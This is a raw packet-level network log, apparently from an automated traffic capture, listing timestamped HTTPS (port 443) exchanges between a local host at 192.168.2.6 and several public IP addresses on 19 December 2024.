                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.520993948 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.521038055 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.521047115 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.521079063 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.521138906 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.523571014 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.524207115 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.524279118 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.524295092 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.524346113 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.528177023 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.532761097 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.532851934 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.532926083 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.532942057 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.533013105 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.534617901 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.534651995 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.534692049 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.534715891 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.534748077 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.535989046 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.537456036 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.542213917 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.542327881 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.542387009 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.542404890 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.542469978 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.546135902 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.546160936 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.546206951 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.546216965 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.546245098 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.546278000 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.546793938 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.547698021 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.547756910 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.547858000 CET49777443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.547879934 CET44349777142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.556710005 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.556731939 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.556803942 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.556812048 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.556833029 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.556967974 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.669984102 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.670015097 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.670094013 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.670108080 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.670125008 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.670440912 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.679176092 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.679197073 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.679239035 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.679246902 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.679291010 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.679517031 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.689308882 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.689330101 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.689388037 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.689400911 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.689431906 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.689479113 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.697110891 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.697133064 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.697171926 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.697180986 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.697212934 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.697243929 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.703739882 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.703762054 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.703845978 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.703845978 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.703855991 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.704181910 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.712666988 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.712701082 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.712734938 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.712743044 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.712779045 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.712933064 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.721101999 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.721158028 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.721194029 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.721199989 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.721236944 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.721266985 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.729482889 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.729528904 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.729615927 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.729621887 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.729635954 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.729866982 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.861476898 CET44349795162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.861618996 CET44349795162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.861701012 CET49795443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.861701012 CET49795443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.864207029 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.864238977 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.864327908 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.864327908 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.864341021 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.867103100 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.871958017 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.871982098 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.872054100 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.872064114 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.872193098 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.878746986 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.878768921 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.878839016 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.878846884 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.878889084 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.886497021 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.886548042 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.886779070 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.886785984 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.886832952 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.894465923 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.894490004 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.894537926 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.894542933 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.894587040 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.894680977 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.899552107 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.900656939 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.900705099 CET44349813162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.900825977 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.901159048 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.901176929 CET44349813162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.902353048 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.902412891 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.902416945 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.902443886 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.902468920 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.902494907 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.909873009 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.909929037 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.910029888 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.910036087 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.910123110 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.916372061 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.916433096 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.916441917 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.916455984 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.916481972 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.916507959 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.992610931 CET44349797172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.992746115 CET44349797172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.992822886 CET49797443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.993341923 CET44349796172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.993381023 CET49797443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:31.993402958 CET49796443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.056493044 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.056545973 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.056586027 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.056600094 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.056634903 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.056648016 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.063294888 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.063376904 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.063385010 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.063410044 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.063436985 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.063458920 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.071194887 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.071250916 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.071281910 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.071288109 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.071326017 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.071338892 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.078910112 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.078950882 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.078990936 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.078998089 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.079026937 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.079046965 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.086801052 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.086842060 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.086903095 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.086909056 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.086951017 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.093935013 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.093986988 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.094059944 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.094065905 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.094086885 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.094089985 CET44349800162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.094105005 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.094976902 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.097686052 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.100775957 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.100821972 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.100850105 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.100855112 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.100893021 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.108629942 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.108675003 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.108705997 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.108711004 CET44349779162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.108747959 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.108761072 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.110459089 CET44349799162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.111170053 CET44349808172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.111629963 CET44349809172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.163535118 CET49779443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.174190044 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.174207926 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.174510956 CET49800443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.174525976 CET44349800162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.175586939 CET44349800162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.175602913 CET44349800162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.175673962 CET49800443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.175884962 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.175899982 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.176008940 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.178328991 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.178354979 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.181467056 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.181510925 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.181550980 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.182652950 CET49808443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.182677031 CET44349808172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.182831049 CET49799443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.182853937 CET44349799162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.183515072 CET49809443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.185874939 CET44349808172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.185914040 CET44349808172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.185945034 CET49808443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.186867952 CET44349799162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.186889887 CET49809443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.186899900 CET44349809172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.186908007 CET44349799162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.186935902 CET49799443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.191663980 CET44349809172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.191704988 CET44349809172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.191731930 CET49809443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.192655087 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.192754030 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.193744898 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.193900108 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.195180893 CET49800443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.195265055 CET44349800162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.195267916 CET49799443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.195496082 CET44349799162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.196563005 CET49814443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.196605921 CET44349814172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.196738958 CET49814443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.197257042 CET49808443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.197403908 CET49809443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.197432995 CET44349808172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.197540045 CET44349809172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.198036909 CET49815443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.198101997 CET44349815172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.198163033 CET49815443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.198595047 CET49814443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.198610067 CET44349814172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.220696926 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.220716000 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.220824003 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.220846891 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.240480900 CET49800443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:32.240502119 CET44349800162.159.61.3192.168.2.6
